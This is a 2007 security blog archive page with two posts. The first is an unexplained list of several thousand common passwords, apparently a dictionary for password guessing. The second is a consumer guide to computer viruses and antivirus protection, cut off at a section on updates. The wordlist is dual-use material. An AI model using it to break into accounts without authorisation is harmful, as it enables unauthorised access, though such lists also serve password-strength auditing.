Archive for the ‘Security’ Category

6k pwl

March 9, 2007

nsync1
nub123
nuclear
nudist
nugget
nukem3d
num123
number
number1
numbers
nurses
nuts12
nuts21
nutsack
nxsh56l4
nympho
nymphos
o1b2i3
o1b2j3
o1h2s3
o1o2o3
o1p2e3n
o1p2e3n4
o1r2g3
o1r2l3
o8j5ant
oakley
obi123
obj123
object
objects
observe
obtain
obvious
obx6m43
occupy
ocean1
oceans
october
october1
october2
october3
october4
october5
october6
october7
october8
october9
octopus
offensive
office
officer
official
offline
ofydmwj
ogeank0f
ogunhqy
ohs123
ohyeah
oinkoink
oklahoma
older1
oldman
oldnavy
oleander
olive1
olive19
oliveoil
oliver
olives
olivia
olympic
olympics
omlets
omnlkj
omnlkji
omnlkjih
omssucks
oneonone
onions
online
online12
online123
onlinedes
onlyifu2
onlykids
onlyme
onlyyou
onmyown
onscreen
ontario
ooo123
oooooo
ooooooo
oooooooo
open123
openmeup
opensky
openup
operate
operator
opinion
oppose
opposite
oppress
opqrts
opqrtsu
opqrtsuv
oprah1
oracle
orange
orange09
orange1
orange12
orange21
orange34
orange56
orange65
orange78
orange87
orange90
oranges
orchestra
orchid
oregon
org123
organize
orgasm
orl123
orlando
orville
orwell
osiris
osw123
others
ou8122
ouijas
outkast
outlaw
outlaws
outside
overhead
overthrow
owned2k
owned2k1
owned2k2
owned2k3
ownyou
oxford
oxygen
p0dr40tf
p0o9i8
p0o9i8u7
p0rn4u
p1a2h3
p1d2n3
p1d2p3
p1f2x3
p1i2l3
p1l2i3
p1o2p3
p1p2p3
p1r2e3
p1s2w3
p1u2p3
p455w0rd
p4ssw0rd
p4ssword
p4xr07v
p8en6k
pa55word
pac123
pacbell
pacers
pacific
packard
packers
pacman
pad123
pad336
padres
pah123
painless
pakistan
palace
palmer
pamela
pamphlet
panama
pancho
panda123
pandora
panies
pansies
pantera
panther
panties
papajohns
paparoach
papers
papsmere
parade
paradise
pardon
parent
parker
parrot
pascal
pass123
pass1234
pass321
pass456
pass654
pass789
pass987
passion
passions
passport
passw0rd
passwd
password
passwurd
patches
path
pathway
patrica
patricia
patrick
paul123
paul1234
paul321
paul4321
paulie
pauline
pauses
pav26lis
pavilion
pazzword
pazzwurd
pcboard
pcgames
pcofizip
pdn123
pdp123
peace1
peach
peach123
peach321
peach456
peach654
peach789
peach987
peaches
peanut
peanuts
pearls
peekaboo
peewee
pegasus
pelican
pellman
pen483
pencil
penelope
penguin
pennie
penny1
pentagon
pentium
pentium1
pentium2
pentium3
pentium4
people
peoria
pepper
peppers
pepsi1
percent
perfect
perhaps
period
permagag
permanent
permit
person
persona
personal
pet123
peters
pets12
petunia
peyote
pfx123
phantom
phatty
philip
phillip
philly
phoenix
phone123
phone321
phone456
phone654
phone789
phones
photos
phvpis
physics
pi4aba
pianos
picasso
pickle
pickup
picture
pie123
pie314
pierre
piggy
piglet
pigpen
pigskin
pil123
pillow
pimphard
pimpin
pin215
pingpong
pinhead
pink123
pink1234
pink321
pink456
pink654
pink789
pink987
pioneer
pioneers
pipe123
pirate
pirates
pirg23
pisces
pistol
pitbull
pitch123
pixies
pizza1
pizza123
pizza321
pizza456
pizza654
pizza789
pizza987
pizzahut
pizzas
pk1l6
places
plague
planes
planet
planets
plastic
platinum
play4aol
playboy
played
player
playoffs
playstop
playtime
please
pleasure
plenty
pli123
plover
plum123
plum321
plum456
plum654
plum789
plum987
plymouth
pmssucks
poetry
poison
poiuyt
poiuytre
pokemon
polaris
police
police1
policy
politics
pollute
pomnlk
pomnlkj
pomnlkji
pontiac
poohbear
pookie
poopie
poopoo
pooter
pop123
popcorn
pope12
pope123
poppers
popular
population
porn123
porn69
porno
pornos
pornstar
porsche
porshe
port80
porter
ports
position
possess
possible
postal
poster
postive
postpone
posture
pot420
potato
potatoes
pothead
potrules
pound
power1
power16
powerful
powers
ppp123
pppppp
ppppppp
pppppppp
pqrtsu
pqrtsuv
pqrtsuvw
pr0digy
praise
prayer
prayers
pre123
precious
pregnant
prelude
prepare
preppy
presario
present
president
pressure
presto
prevent
priest
prince
princess
printer
prison
private
probably
problem
problems
prodigy
produce
profile
progen
program
progress
project
promise
property
propetia
propose
protect
protest
protocol
provide
psalms
psw123
psycho
public
publish
puddytat
pumpkin
punish
punkass
punkers
punkrock
punks1
punky1
pup123
puppet
puppies
puppydog
puppys
purchase
purest
purple
purple1
purple12
purple99
purpose
pussies
pussy1
pussy69
pussycat
pussys
putang
putnam
putter
pw1234
pwc123
pwc2k
pwc321
pwcing00
pwcing2k
pwczju
pwpwpw
pws123
pws321
pyramid
pyscho
python
q1a1w2s2
q1a2z3
q1q2q3
q1w2e3
q1w2e3r4
q455w02d
q48d6syy
qauntum
qavth9nh
qawsedrf
qazwsx
qdx8uzci
qen55o
qewrty
qf24i2
qh8r6f
qpomn
qpomnl
qpomnlk
qpomnlkj
qqq123
qqqqqq
qqqqqqq
qqqqqqqq
qrtsuv
qrtsuvw
qrtsuvwx
quarter
quartz
quebec
queens
question
qv0cuuq
qwaszx
qwe123
qwer1234
qwerty
qwerty00
qwerty1
qwerty123
qwerty2k
qwerty99
qwertyu
qwertyui
qwertz
qwertzui
r0e9d8
r1a2d3
r1a2h3
r1a2m3
r1e2d3
r1e2f3
r1e2l3
r1e2m3
r1e2s3
r1e2v3
r1f2s3
r1l2d3
r1o2c3
r1o2m3
r1r2r3
r2e0d00
r42hwd8
r4e3d2
r4e3w2q1
r4e6d8
r5ys18x
r6zs29x
rabbit
rabbits
racecar
racers
rachael
rachelle
racings
racisms
rad123
radar
radio
radio1
raft
rage
rage212
rah123
raid
raider
raiders
railroad
rain
rainbow
raindrop
rainman
rainy
raise
raleigh
ralleys
ralph
ram123
rambo
rams
ramsey
rance
randolph
random
randy
range
ranger
rangers
ransom
rapid
rapist
rapper
raptor
raquel
rare
rascal
rate
raul
raven
raven1
ravens
raymon
raymond
read2me
reagan
reality
reallove
really
realman
realove
realplay
reaper
reason
rebecca
rebekah
rebel00
rebel1
rebel97
rebels
receive
recent
record
recovery
recycle
red100
red101
red123
red1234
red12345
red2000
red2001
red321
red345
red420
red456
red56red
red654
red678
red789
red911
red987
redabc
redaol
reddog
redguy
redhead
redlight
redman
redneck
redo66
redpepper
redred
redrum
redskins
redsox
reduce
redwing
redwings
redwood
reebok
reeses
ref123
referee
reflex
reform
refugee
refuse
reggie
regina
regret
rel123
relaxed
release
religion
rem123
remain
remember
remix
remote
remove
rench
rene
renee
rent
repair
repeat
rephah
report
reports
reptile
request
res123
rescue
research
reset01
reset02
reset03
reset04
reset05
reset123
reset321
reset45
reseter
reseters
resets
resign
respect
rested
restore
restored
restrain
restrict
result
resume
retire
return
reuben
rev123
revolt
reward
rewards
rewind
rewq4321
rfs123
rhinos
rhodeisl
rhonda
rhythem
ri8r7
ricardo
richard
richards
richie
riddler
riders
rights
rihcpn3i
ringl2
ringl5
ripper
ripple
rivers
rld123
roaches
roadrule
robbie
robert
roberto
roberts
robinson
robotics
roc123
rochelle
rock12
rockers
rocket
rockets
rocknrol
rockroll
rocky1
rocky2
rocky3
rocky4
rocky5
rocky6
rodent
roderick
rodman
rodney
rodrick
rofl123
rofl321
rofl456
rofl654
rofl789
rofl987
rofllmao
roflmao
roflmfao
rogers
roland
roller
rollers
rom123
romance
romano
romans
romantic
romeo
rommel
ronald
ronnie
rookie
rooster
rosalyn
rosary
roscoe
rosebud
rosemary
roses1
roxanne
royal1
royals
rpgsrule
rph1506
rqpomn
rqpomnl
rqpomnlk
rrr123
rrrrrr
rrrrrrr
rrrrrrrr
rtsuvw
rtsuvwx
rtsuvwxy
rubber
rubbers
rumble
run123
run1933
run2001
runner
runners
rush2112
russell
rwh0q14
s18nwn
s1d2s3
s1e2q3
s1i2g3
s1l2t3
s1m2l3
s1o2x3
s1p2l3
s1p2p3
s1s2p3
s1s2s3
s1t2m3
s1t2y3
s1v2c3
s1y2m3
s1y2n3
s3cr3t
s3cret
s3pu7d5r
s6r8ktkj
s8n485
sabotage
sabrina
saclinda
sacrifice
sailing
sailor
sailors
saints
salt123
salt321
salt456
salt654
salt789
salt987
samantha
sammie
sammy1
sampson
samsam
samson
samsung
samuel
samurai
sanders
sandie
sandman
sandra
sandwich
sanity
santana
saratoga
sasoon
sassy1
satans
satisfy
saturday
saturn
sausage
savage
savannah
saveas
savior
scamper
scanner
scarey
scarlet
sch20021
sch2oo2l
scheme
school
school1
schuler
science
scooby
scoobydo
scooter
scorpio
scorpion
scotland
scott123
scottie
scotty
scouts
scream
screen
screws
script
scroll
scrotum
scully
sds123
seagate
search
seashell
season
seattle
sebastian
second
secr3t
secret
secure
secure52
secure56
secure58
secured
securid
security
seeker
seeyou
seize
select
selena
selina
senate
send
sendmail
senior
senna
senorita
senors
sense
sensor
sentence
sept123
seq123
serenity
sergio
serial
series
serious
sermon
server
servers
service
sesame
settle
seventeen
seventh
sevenup
several
severe
sex123
sex321
sexabc
sexiest
sexrules
sexsex
sexual
sexy4u
sexy69
sexyman
sexywoman
seymour
sg1210r6
shadow
shadows
shaggy
shannon
sharks
sharky
sharon
sharp
sharp1
sheena
sheila
shelby
sheldon
shelia
shelly
sherley
sherman
sherri
sherry
sheryl
shift
shiloh
shirley
shithead
shiting
shitty
shivers
shiznit
shiznits
shocker
shooter
shorts
shorty
shortys
shotgun
should
showme
showtime
shr00m
shr00mz
shrewms
shrink
shroom
shroomie
shrooms
shroomz
shutdown
shuttle
shyone
shyone1
shyone21
shyone23
sickness
sicness
sidney
sierra
sig123
sigmund
sign0n
signal
signin
signmeup
signoff
signon
signup
silence
silicon
silly
silva
silver
silvia
similar
simon
simple
simpson
simpsons
sinbad
singer
single
sinister
sinner
sister
sisters
situation
sixteen
sixty9
sixtynine
sj9s8g
sk8board
sk8er
sk8ter
skank
skate
skater
skating
skeeter
skeleton
skibird1
skibum
skipper
skippy
sky123
skyblue
skydive
skzsmv2
slapjack
slapmonk
slayer
sleeping
slick
slidee
slipknot
sliver
slt123
slugg
slurp
slurpee
smack
small1
smalls
smart1
smelly
smiles
smiley
smilie
smith
smitty
sml123
smoke4me
smoker
smokeweed
smokey
smokin
smooch
smooth
smother
snakes
snapper
snappy
snatch
sneaker
sneakers
sneezey
sneezy
snicker
snickers
sniper
snocone
snoman
snoopdog
snoopy
snowball
snowbord
snowman
snsnsn
snuff
soccer
soccer1
soccer22
social
soda123
soda321
soda456
soda654
soda789
soda987
sodapop
softail
softball
software
soldier
soloman
solomon
solomons
solution
somebody
somethin
sommer
sommers
sondra
songbird
sonicboom
sonice1
sonics
sooner
sophia
sophie
sorry4
southcar
southdak
southpark
southpol
southpole
sox123
spagheti
spanish
spanking
sparkle
sparky
sparrows
spartan
speaker
speakers
spearhead
spears
special
specimen
specter
spector
spectral
spectrum
speech
speed123
speed321
speed456
speed654
speed789
speed987
speeding
speedo
speedup
speedway
speedy
speller
spelling
spencer
spender
spenders
spending
spends
sperms
sphere
sphinx
spices
spider
spiderman
spiders
spilled
spiller
spillers
spills
spillway
spinal
spirit
spitfire
spl123
sponge
sponsor
spooge
spooked
spooker
spooky
spooler
sportfish
sports
sportsman
spotless
spotlight
spotter
spotty
spousal
spouse
spp123
sprain
sprayed
spring
spring00
spring01
spring1
spring2k
spring99
springer
sprint
sprite
spruce
spunky
spyder
square
squash
squires
squirt
sramb43
ssp123
sss123
ssssss
sssssss
ssssssss
stacie
staind
stalker
stallion
standup
stanley
stanly
star12
star123
stardom
stardust
starfish
stargate
starrep
stars
start1
startrek
starve
starwars
states
static
station
statue
status
stayon
stayout
stealing
stealth
steeler
steelers
stefan
stella
stephanie
stephen
sterling
steroid
stevecase
steven
stevie
stewart
sticks
stimpy
stinger
stingray
stinky
stm123
stocks
stolen
stomach
stones
stoopid
stop12
stopgo
stopplay
stormy
straight
strange
strangle
street
strength
stretch
strike
stripper
stroke
strong
strqpo
strqpom
strqpomn
struggle
stuart
stubborn
student
study1
stumpy
stupid
stupidshit
sty123
styles
subject
sublime
subtract
subway
succeed
success
suck69
suckdick
sucker
suckit
suckme
suckme2
sucks
sudden
suffer
sugars
suicide
summer
summer00
summer01
summer02
summer2k
summer51
summer66
summer98
summer99
sun123
sunday
sunlight
sunny
sunrays
sunrise
sunset
sunsets
sunshine
superman
supersta
superstr
supply
support
suppose
suppress
supreme
surfer
surplus
surprise
surround
survive
susanne
suspect
suspend
suvwxy
suvwxyz
suzanne
suzette
suzuki
svc123
swallow
swearer
sweeet
sweet123
sweet16
sweetie
sweetie1
sweeties
sweetpea
sweets
sweety
swimmer
swinger
swingers
switch
swords
sydney
sylvia
sylvie
sym123
symantec
symmetry
sympathy
syn123
sysadmin
sysman
sysmgr
system
t1d2r3
t1h2o3
t1o2s3
t1r2t3
t1s2s3
t1t2t3
t1u2t3
t1u2x3
t1x2t3
t4793k
tacobell
taft123
talkshow
tamara
tammie
tampon
tanker
tanner
target
tarots
tatiana
tattoo
taurus
taxman
taylor
tazman
tdr123
teach1
teach123
teacher
teacher1
teaching
team123
team2k
tearup
techno
teddie
teenage
teenager
temple
tenagers
tennesse
tennis
tenticle
tequila
teresa
terminal
terrible
terror
tess913
test12
test123
tester
testest
testicle
testing
testtest
testuser
texas1
textbox
textiles
tfr1956
thailand
thanks
thanku
thankyou
theater
thebeach
thebest
theend
theman
theodore
theresa
therock
theshit
thieves
thinking
thirteen
tho123
thomas
thompson
thousand
threaten
threed
through
throw
thumper
thunder
thursday
tiffany
tigers
tigger
tigger1
tigger69
tiggers
timber
time12
time2die
time2eat
time2go
timisgay
timothy
tinker
tintin
tissue
titanic
titans
titman
titties
toast123
toast321
toast456
toast654
toast789
toast987
tobacco
together
tom123
tomato
tomatoes
tomcat
tomgreen
tomorrow
tomtom
tongue
tonight
toolshed
topdog
topgun
tornado
tortoise
torture
tortured
tos123
tos1234
tos12345
toshiba
tostos
toward
toyota
tracey
tracie
trader
tragic
trails
train
trained
trains
traitor
tramps
transam
transfer
travel
travis
treason
treasure
treaty
trevor
triangle
tribal
tribes
tricked
tricks
tricky
trinity
tripped
trisha
tristan
triton
triumph
trivial
trixie
trojan
trombone
trooper
troopers
troops
trouble
trqpom
trqpomn
trqpomnl
trt123
trucker
trucks
truelove
truman
trumpet
trustno1
tryagain
tss123
tsuvwx
tsuvwxy
tsuvwxyz
ttt123
tttttt
ttttttt
tttttttt
tubas
tucker
tuesday
tupac1
tupacs
turkey
turner
turnip
turtle
tut123
tuttle
tux123
tv9tw53r
tvshow
tweety
twelve
twenty
twi2000
twin12
twister
twmhm7
txt123
tyler1
tyler123
u1b2c3
u1d2o3
u1h4oz
u1l2u3
u1m2p3
u1s2a3
u1u2u3
u5794l5q
u8i9o0
ubc123
udo123
uioppoiuy
uioqwerty
uiqwerty
ujikol
ujikolp
ultima
ulu123
ump123
unable
unhappy
unicent
unicorn
uniform
unique
united
universe
unknown
unless
unlimit
unlock
unlocked
unreal
untitled
up2u4it
up6qb0
updaass
upgrade
uppers
uqwerty
uranus
urchin
urgent
ursula
usa123
usa1234
usa1999
usa2000
usa2001
usa2002
usa321
usa911
usasucks
usasux
usbport
user12
user123
username
ustrqp
ustrqpo
ustrqpom
utility
utxmhm
uuu123
uuuuuu
uuuuuuu
uuuuuuuu
uvwxyz
uxdin8
uxnin8
v1v2v3
vagina
vaginas
valerie
valiant
valium
valley
values
valume
valumes
vampire
vanessa
vanilla
vanity
varcity
vaseline
vcwh63v
vehicle
velvet
vermont
veronica
veronika
version
vertigo
verysad
vfr4bgt5
viagra
vicious
victim
victor
victora
victoria
victory
videos
viking
vikings
village
vincent
violate
violence
violet
violet09
violet12
violet21
violet34
violet43
violet56
violet65
violet78
violet87
violet90
violin
viper1
vipers
virgin
virginia
virgo1
virgo97
virgos
virtual
viruses
vision
visions
visitor
visual
visuals
vivian
vivica
voilet
volcano
volley
voodoo
voyage
voyager
voyeur
vulcan
vulgar
vustr
vustrq
vustrqp
vvv123
vvvvvv
vvvvvvv
vvvvvvvv
vwjetta
w1w2w3
w7ac6ny
w96m1im
wagner
wakeme
wakemeup
waldo1
walkaway
walker
wallace
walmart
walnut
walrus
walter
wanker
waol25
waol30
waol40
waol50
wargames
warlock
warned
warner
warning
warren
warrior
washingt
wasssup
wasted
wazzup
wazzzup
wealth
weapon
weapons
weasel
weather
webcam
webcams
webpage
website
webster
wednesday
weed123
weed321
weed420
weed456
weed4me
weed4u
weed654
weed789
weed987
weedsmoke
weekday
weekdays
weekend
weekends
weenie
weight
weiners
welcome
wendall
wendel
wendell
wendys
werner
wesley
western
westside
westvirg
wetlands
wetpussy
wh0r35
wh0r3s
wh0res
whatever
whatnot
whiners
whiskey
white123
white321
white456
white654
white789
white987
whites
whitesox
whitney
wholesale
whore
whore1
whores
whothere
whyneoh
whynot
wicked
wife12
wilbur
wildcat
wildcats
wildgirl
wildman
willburr
william
williams
willie
willing
willis
willow
willy
wilma
wilson
win123
win2000
win2k
win95
win98
window
windows
windows2
windows3
windows9
wine123
wine321
wine456
wine654
wine789
wine987
wingding
wingman
winme
winner
winnie
winning
winston
winstone
winter
winter00
winter01
winter02
winter1
winter12
winter20
winter2k
winter55
winter98
winter99
winwin
winzip
winzip1
wireless
wisdom
wisegal
wiseman
wiseone
wishes
witches
withdraw
without
wizard
wjn16z
wolfgang
wolfman
wolverin
wolves
womans
wombat
womens
wonder
woodie
woods
woodwind
woodwork
woody1
woofer
woohoo
woopwoop
word123
wordpass
working
worksux
worlds
worldwar
wormwood
wowwow
wq7rcb
wr8sd2
wrangler
wrestle
wrestler
wright
wrinkle
writer
wt1dns
wtfuck
wtfwtf
wutang
wuwear
wvustr
wvustrq
wvustrqp
wvyojo9
wwfwcw
www123
wwwwww
wwwwwww
wwwwwwww
wyoming
x1x2x3
x2dwv6
xanadu
xavier
xfiles
xgv4e1d3
xhugx9
xko170m
xlpzgqjd
xmodem
xsw2cde3
xum0unx4
xwr42ixe
xwvust
xwvustr
xwvustrq
xxx123
xxxxxx
xxxxxxx
xxxxxxxx
xyz123
xyz1234
xyz12345
xyz321
y0ubmg
y1y2y3
y2000
y2001
y2k2001
y2kaol
y2z7jj
y6u7i8
y6u7i8o9
y704tla
yamaha
yankee
yankees
year2000
year2001
year2k
yeehaw
yelloe
yellow
yellow0
yellow1
yellow12
yellow2
yellow25
yellow3
yellow4
yellow5
yellow6
yellow7
yellow8
yellow9
yellow98
yesterday
yhvhxa
yokoono
yolanda
yosemite
youngin
yousuck
youyou
ys9kf4r
ytrewq
yuep2g
yvonne
yxwvus
yxwvust
yxwvustr
yyy123
yyyyyy
yyyyyyy
yyyyyyyy
z1vcni7
z1x2c3
z1z2z3
z6m9t4r
zachary
zackary
zaq1xsw2
zaxxon
zebra1
zebras
zeppelin
ziggy
zigzag
zigzag1
zimmerman
zipdisk
zipdrive
zipper
zippers
zippos
zippys
ziy6g3g6
zmodem
zombie
zone69
zonker
zxc123
zxcvbn
zxcvbnm
zyx321
zyxwvu
zyxwvus
zyxwvust
zz123zz
zzy2rmr
zzz123
zzz1234
zzz321
zzz4321
zzzzzz
zzzzzzz
zzzzzzzz

Viruses & how to protect yourself from them

March 3, 2007

Synopsis: an introduction to viruses and how to protect
against them by using practical techniques and anti-virus software.
Some technical discussion at the end. Aimed at users on computers
running Windows as opposed to network administrators.
Outlook Express covered in depth.

0. Introduction.
This is a 15 page article introducing the topic of viruses and
what you can do to protect yourselves. If you do not have the time
to read it, there are three simple points to remember:

I.               NEVER OPEN EMAIL ATTACHMENTS

II.              INSTALL ANTI-VIRUS SOFTWARE

III.             KEEP YOUR ANTI-VIRUS SOFTWARE UPDATED

Anti-virus software is a must, but it is not a catchall.
You also need to educate yourself and your users about the sort of
behaviour that will open your system to viruses.

1. What is a virus?
A virus is a piece of software or code which when run will harm
your computer in some way. What makes them dangerous is that they
are able to use features on your computer to spread themselves
(“propagate”); most viruses are an outright threat to your security
and privacy in many different ways.

There are thousands of different viruses to be found on the Internet
(referred to as being “in the wild”). They do different things to
your computer and propagate in different ways.
In terms of their destructive ability, some can crash
your computer and destroy files. Others install dangerous packages on
your computer that allow others to control it when connected to the
Internet, which means they use your computer to hack / attack other
computer systems. Yet others are more interested in finding out
personal details and credit card numbers and sending them back to
the virus creator.

Some viruses are known to actually email some of your files out across
the Internet, as has apparently happened to the Ukrainian secret
service, and the Japanese police. [4]

Many viruses currently use people’s email address books to propagate
through the Internet. They are growing more sophisticated all the
time, and sometimes the virus will send itself out to one of your
contacts using the name of another of your contacts. Thus, if you
get an email from bob@privacybasics.info then the chances are that
Bob is completely innocent and that the real ‘culprit’ is a mutual
contact. The only way to confirm which computer the virus actually
originated in is by checking the email headers (see our article on
how to do this at http://www.privacybasics.info/email.html).

Other viruses simply make up email addresses to send to, so others
end up getting loads of emails with subjects like “message
undeliverable”, often carrying a copy of the viruses themselves,
as other servers automatically bounce the email back to the supposed
sender. This does not necessarily mean that you have a virus (even
if the return message indicates as such), but more likely that
someone with your email in their address book has it, and you are
unfortunately getting the fallout instead. The technique of using
false or other people’s email addresses is known as
‘email spoofing’ (for a short overview see
http://www.cert.org/tech_tips/email_spoofing.htm).

Anti-virus software is not the same as a “firewall”.
A firewall performs a different type of function, though the
two generally complement each other. You should have both anti-virus
and firewall software; many manufacturers offer them together as a
suite.

Some viruses actually attempt to fight back against previous viruses,
uninstalling them. However, this is not acceptable behaviour and is just
as much an intrusion; plus, how sure can you be that these new viruses
are as beneficial as they make out to be?

Note: the term virus comes from early analogies with the biological
virus, a self-replicating bit of code that does little good to
anyone who contracts it. Various experts quibble over just how far
this analogy can be drawn, but for simple understanding of viruses it
is a good enough analogy. We will adopt the plural form viruses,
though some people prefer the grammatically accurate version of virii.

Protecting yourself against viruses is not just about protecting
yourself, but showing a basic courtesy to all your contacts as well.
Allowing yourself to become infected will not win you any gratitude.

2. What is Anti-Virus software?
Anti-virus software [AV] is a programme designed specifically
to defend your computer against viruses and other dangerous software
[referred to as ‘malware’]. It comes in a variety of types,
but all perform the same basic function: they examine
your system and its actions, waiting for signs of malicious code or
specific actions that would compromise your computer.

Depending on how it has been designed and how you have configured the
software, it will either warn you that there is a danger or take
action immediately to isolate the threat (sometimes referred to
as “quarantine”); or both.

For the most part AV software works in the background, only
appearing when it detects a risk and acting as you have told it to.
However, it generally also allows you to call it on command to check
files/programmes before you use them.

The most popular commercial anti-virus programmes are:

Norton (http://www.symantec.com/)
McAfee (http://www.mcafee.com/)
Sophos (http://www.sophos.com/)
Kaspersky (http://www.kaspersky.com/)
F-Secure (http://www.f-secure.com/)
MessageLabs (http://www.messagelabs.com/)

Good, free anti-virus software for Windows we can recommend is
AVG from http://www.grisoft.com/; this is a better solution than
switching between free trials of AV software each time they expire.
You should also be aware that anti-virus software which comes
bundled with new computers might have an expiry date, after which
it will no longer protect you – check for this and ensure that your
AV software is still active.

3. How to get a virus
Viruses propagate in a number of ways. Modern viruses will actually
use several of them.

Emails
One of the most common ways, especially with Windows based viruses,
is through email. The virus accesses files associated with your email
software (mainly they focus on Outlook Express), reading through them to
gather email addresses. It then copies itself to send out an email to
your contacts, sometimes in your name, sometimes in the name of
another person on your list of contacts.

By doing this, the authors of the virus hope that the recipient,
knowing the ‘sender’, will be tricked into opening the
email/attachments and thus infect their computer in turn. Often
they use messages designed to put off fears, or encourage people
to click on the attachments.

Spam also can carry viruses as well as advertising products. Some
attempt to trick people into downloading files from websites that
carry viruses.

Techniques to reduce spam will also have the benefit of reducing the
risk from viruses.

There are two main ways of transmitting through email. Attachments
are probably the most common form; they require people to open the
attachment for the virus to be able to infect. It is for this reason
that anti-virus experts constantly emphasise the message of not
opening attachments and of double-checking them.

The other method is through the use of HTML emails, that is emails
with fancy designs and images in them. These are based on the same
technology as web pages and can hide interesting things like
JavaScript and ActiveX, which in Outlook Express can create holes
virus writers can exploit. Increasingly, this means that simply
opening up HTML-enabled email or using preview panes is enough to
get the virus to automatically infect, or be downloaded from the
Internet. The simple and effective solution is to configure your
email programme to switch to text only mode.

Internet
Files from the Internet are not always as they seem.
Downloading files, whether from websites or file-sharing (p2p)
software such as Kazaa, carries the risk that they are viruses or
have viruses attached.

Likewise there are methods for sending files across IM systems that
also have viruses attached. Viruses can also send themselves via IM.

Floppies / CD
The first viruses were transmitted by floppy disks. Though not as
common a method of propagating viruses as it once was, it is still
around and needs to be guarded against. Files are infected with a
virus, which are then passed to other people who put the files on
their own system and accidentally activate the virus that then
spreads to other files on the computer.

Networks
If a virus infects one computer on a network it can spread through
the network to all the other machines. This is why anti-virus
software needs to be active on every computer in a network, or
that has permission to attach to it. It only takes one user on the
network to slip up for everyone to suffer the effect.

Note 1
As well as being programmes in themselves, viruses can insert
themselves inside files or other programmes without actually harming
the file itself. When the latter are opened or run, the virus is
also activated. In many cases the virus can be stripped from the
file, leaving it safe to use.

Note 2
When a virus sends itself out in an email, the recipients may not
exist and the email will bounce back. If the email has been sent in
your name, the rejection will be sent to you, even though the email
may not have come from your system. Likewise, if the recipient’s
system rejects the email on the grounds that it has a virus attached,
it will also send the bounce message back to the person in the
“To:” or “Reply-To:” field, even if they have had nothing to do with
it. See the second website in [3] for a ‘rant’ on this issue.

4. Disinfecting
If you have been infected by a virus you need to take immediate
action and follow these steps.

Take your computer off the Internet immediately.
Make a note of the effects of the virus.
Find out just what you have been infected with (note, the name of a virus may differ from one anti-virus company to another).
Disinfect your computer.
Update your anti-virus software.
Update the software that has been affected with the latest patches or versions.
Check that no floppies or other storage devices have been affected either, otherwise you could end up re-infecting yourself and others all over again.

Most anti-virus software creators have sections on their websites which
have descriptions of viruses and what should be done to
remove them from your computer. Some now supply programmes, often
free, for the more common viruses, which will help you disinfect
your computer. If you cannot find it on your AV software supplier’s
site, check the websites of its competitors.

Not all anti-virus software is good at letting you know what it is
that has infected you. Do not panic when a warning appears, but
work through it methodically until you have identified the threat
and dealt with it. On Windows systems, disinfecting will normally
involve removing several files and editing the ‘registry’. It is
important that once you have removed the infection, you fix
your software, whether updating the anti-virus software or the other
software which allowed the virus to infect in the first place,
otherwise there is little to stop you getting infected all over again.

Even with all the best practices in place, it is not possible to
guarantee 100% that a virus will not hit your computer. If the virus is
particularly malicious this could cost you all your data and even the
computer itself. This is another reason why making backups is
important. You should also make sure you have boot disks available in
case the virus deletes vital files needed by your operating system
to work.

5. Basic tips for everyone
Many viruses use ‘social engineering’ techniques to get you to
believe that the message is genuine and from a friend of yours.
If the message doesn’t explicitly say what is in the file, or you are
not expecting it, or even if the language seems vague and unlike
your contact’s normal messages, then be suspicious. It is not hard
to fake an email as if it came from another address.

Using Email
DON’T OPEN ATTACHMENTS; this is the most important bit of advice
currently available. Simple but effective. It does not matter if the
attachment appears to come from a friend or is something you are
interested in. If it is not expected then don’t trust it.
Turn off any features in email, which automatically launch attachments.
In Windows turn off WSH (Windows Shell Hosting), and other scripting
features as this is what allows some viruses to activate without the
recipient’s consent. Switch to text only mode, both for sending and
receiving emails. Watch out for specific file attachments such as .vbs,
.bat, .scr, .exe and .pif, all of which are generally viruses. Set
the rules/filters on your email programme to automatically trash any
messages with attachments containing these extensions as they will
serve no purpose other than virus transmission.
Also scrutinise .zip files, as these are increasingly common sources
for transmitting a virus, though they have legitimate uses as well.
Anti-virus software can now scan inside these files, but only to a
certain depth. If a zip file has been ‘zipped up’ a good number of
times, then treat it with the utmost caution. If it is very rare
for you to get .zip files, then simply block such messages altogether.

A problem with zip files is that not all AV software can
scan inside them if they are password protected. However, in order to
get you to open the file, they have to send you the password. So if
you get an email with a password-protected zip file and a message
giving you the password, then it is a good bet it is a virus, or a
contact with zero grasp of security concepts. Friends and contacts do
not suddenly start sending you this sort of message, so that should
be another sign to be suspicious. Watch out for generic messages that
do not say anything of substance. If in doubt, ask the sender if they
have actually sent the email/attachment. Don’t listen to what
unsolicited messages of advice say – especially if they tell you to
delete files. Generally it is best to ignore these messages as spam;
or check on anti-hoax or anti-virus websites to see if it is a scam.
Messages from “admin@your-isp.com”, “bill.gates@microsoft.com”,
“staff@symantic.com”, etc. are generally fakes, and should be
ignored – especially if they are asking you to open attachments. Emails
posing as cures or preventions for other virus attacks are likely to
be viruses themselves and should be deleted.

On the Internet
Downloading files – scan all files before using them. This goes
whether the files are from websites or obtained through file-sharing
programmes. Some websites attempt to install software on your computer
in order to work properly. This should not be automatic and a
warning message should appear. If this happens, DO NOT say ‘yes’ to
it. It is far safer to leave the website immediately. Instant
Messaging now allows files to be transmitted. Some viruses can spread
by pushing infected files at other people on the network. If you are
not expecting a file from one of your ‘contacts’ take precautions
first and check before opening.

CDs & Floppy disks
Check any files you copy onto your computer, or before opening them.
Ideally, you will have active anti-virus software which will
automatically scan files / programmes and alert you to any threats.

Be suspicious of any disks of unknown origins. Likewise, just because
your friend has passed you a file, it does not mean that it is safe
as they might not be taking the right precautions themselves and may
not realise that they are infected. Tell them!

CDs offering software, etc, on the front of magazines are not
completely immune either.

Anti-Virus Software
Make sure you keep your AV software up-to-date (see next section).
Check the website of the software you are using for tips and
guidelines to keeping your AV software working at its best.
Activate your AV software so it is working all the time, and not
just when you are suspicious of a file.

Update your software
Many viruses act by exploiting flaws in the software you use, or the
underlying operating system. Do not just trust anti-virus software
to protect you. You can help yourself considerably by keeping
your software up to date and applying any appropriate patches.
Ideally, you will set time aside to check the websites associated
with your various programmes for any updates that may need to be
applied. If you use Outlook Express/Internet Explorer
on Windows, we recommend updating on a regular basis, as these
programmes are among the main targets of virus writers. In particular,
we recommend using an alternative to Outlook Express (see below for
more details).

Final notes. Windows is by far the operating system most at risk from
viruses. However, that does not mean users of other operating systems
are automatically safe. Numbers of Linux viruses are increasing now,
but Linux is still harder to infect due to the way it works. Viruses
for the Mac are few and far between, though they do exist; with Macs
the main thing is to avoid opening attachments.

6. Live Updates
Viruses are continually changing and new ones written all the time.
